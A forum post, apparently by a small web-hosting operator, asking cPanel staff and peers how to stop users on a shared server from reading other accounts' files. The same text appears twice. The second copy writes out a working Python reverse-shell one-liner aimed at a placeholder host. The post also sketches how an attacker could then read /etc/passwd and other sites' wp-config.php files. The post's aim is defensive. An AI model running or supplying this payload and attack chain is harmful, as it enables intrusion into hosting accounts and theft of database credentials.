What I discovered is SHOCKING. Not really shocking to me because I kinda already knew it was possible.
So here's what's happening... I am no longer... how can I say 'guy with big hosting company' like before you know I had 2000 clients and really had money to pay cloudlinux, kernelcare and all that extra software... BEfore some guy screwed me over and not payed me a single cent for my hosting company which i 'sold' to him.
I ran a new one and my income is not great I maybe have 1-3 clients monthly, i am using server for my personal sites too so it's okay to me.
So i do not have money to pay CloudLinux and all that great additional software I could afford before, i only can pay dedicated server + cpanel license.
So here is what is happening. I knew cPanel on it's own is not well secured so I did everything I could to secure it.
Enabling suphp, openbase_dir protection, mod_security and 1001 more things...
Unfortunately there is one way any site can be hacked and it's all because of perl and python.
Even though php is well protected preventing backconnect, access to /etc/passwd and many more security measurements... If you upload cgi-telnet perl script to any hosting account, then you execute this command
You can easily establish shell session , and easily read /etc/passwd file through python...
now that hacker knows all cpanel usernames can easily do this
cd /home/username/public_html
And he can read wp-config.php file without a problem and then mess with database....
So guys from cPanel is there solution to this except buying extra software from your partners?
what about jailshell or disabled shell access? it's obviously no help. to this. or openbasedir protection.
hacker can also read using contents of other user public_html files using PHP if he knows username, but he can't access /home/ or /hom/user
Of course I tried setting public_html to 0750 like many years before but something obviously changed something and now that create error to the sites...
Dear fellow hosting providers, friends and cPanel staff is there a solution to this?
So here's what's happening... I am no longer... how can I say 'guy with big hosting company' like before you know I had 2000 clients and really had money to pay cloudlinux, kernelcare and all that extra software... BEfore some guy screwed me over and not payed me a single cent for my hosting company which i 'sold' to him.
I ran a new one and my income is not great I maybe have 1-3 clients monthly, i am using server for my personal sites too so it's okay to me.
So i do not have money to pay CloudLinux and all that great additional software I could afford before, i only can pay dedicated server + cpanel license.
So here is what is happening. I knew cPanel on it's own is not well secured so I did everything I could to secure it.
Enabling suphp, openbase_dir protection, mod_security and 1001 more things...
Unfortunately there is one way any site can be hacked and it's all because of perl and python.
Even though php is well protected preventing backconnect, access to /etc/passwd and many more security measurements... If you upload cgi-telnet perl script to any hosting account, then you execute this command
Code:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("some ip",some port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
now that hacker knows all cpanel usernames can easily do this
cd /home/username/public_html
And he can read wp-config.php file without a problem and then mess with database....
So guys from cPanel is there solution to this except buying extra software from your partners?
what about jailshell or disabled shell access? it's obviously no help. to this. or openbasedir protection.
hacker can also read using contents of other user public_html files using PHP if he knows username, but he can't access /home/ or /hom/user
Of course I tried setting public_html to 0750 like many years before but something obviously changed something and now that create error to the sites...
Dear fellow hosting providers, friends and cPanel staff is there a solution to this?